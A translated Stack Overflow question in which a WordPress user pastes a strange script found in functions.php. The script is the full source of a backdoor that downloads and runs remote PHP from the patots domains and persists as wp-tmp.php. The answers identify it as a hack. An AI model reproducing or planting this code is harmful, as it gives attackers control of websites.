WordPress Functions.php - 奇怪的脚本

内容来源于 Stack Overflow,并遵循CC BY-SA 3.0许可协议进行翻译与使用

  • 回答 (2)
  • 关注 (0)
  • 查看 (147)

目前,当我在WordPress网站上工作时,我有以下代码,它会自动添加到functions.php文件的顶部,这是在我的笔记本电脑本地发生的。

请指教,这是脚本: -

<?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '803ee29202dba58355290373a7e208fa'))
        {
    $div_code_name="wp_vcd";
            switch ($_REQUEST['action'])
                {






                    case 'change_domain';
                        if (isset($_REQUEST['newdomain']))
                            {

                                if (!empty($_REQUEST['newdomain']))
                                    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                                {
                                                                                                     if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                                 {

                                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                           @file_put_contents(__FILE__, $file);
                                                                   print "true";
                                                                                                                 }


                                                                                }
                                    }
                            }
                    break;

                                    case 'change_code';
                        if (isset($_REQUEST['newcode']))
                            {

                                if (!empty($_REQUEST['newcode']))
                                    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                                {
                                                                                                     if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                                 {

                                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                           @file_put_contents(__FILE__, $file);
                                                                   print "true";
                                                                                                                 }


                                                                                }
                                    }
                            }
                    break;

                    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
                }

            die("");
        }








    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if(!function_exists('theme_temp_setup')) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }

            function theme_temp_setup($phpCode)
            {
                $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
               if( fwrite($handle, "<?php\n" . $phpCode))
               {
               }
                else
                {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                }
                fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }


    $wp_auth_key='74278a0b1580c2851b6ef39c8f1560a5';
            if (($tmpcontent = @file_get_contents("http://www.patots.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.patots.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }

                }
            }


            elseif ($tmpcontent = @file_get_contents("http://www.patots.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }

                }
            } 

                    elseif ($tmpcontent = @file_get_contents("http://www.patots.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }

                }
            }
            elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));

            } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 

            } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 

            } 





        }
    }

    //$start_wp_theme_tmp



    //wp_tmp


    //$end_wp_theme_tmp
    ?>
提问于
用户回答回答于

您的网站遭到黑客入侵。

它从中加载恶意内容http://www.patots.pw/code.php。它似乎也试图设置主密码以绕过正常的身份验证。

我建议您删除所有文件以确保威胁消失。

这可能来自尝试安装:

A)来自模糊来源的“免费”插件。

B)来自模糊来源的“自由”主题。

有关更多信息,请参见此处此处

用户回答回答于

正如ProEvilz所说,您的网站遭到黑客入侵。也许你的服务器也被攻击了。您也可以尝试安装Wordfence等Wordpress安全插件并进行扫描。

扫码关注云+社区

领取腾讯云代金券

年度创作总结 领取年终奖励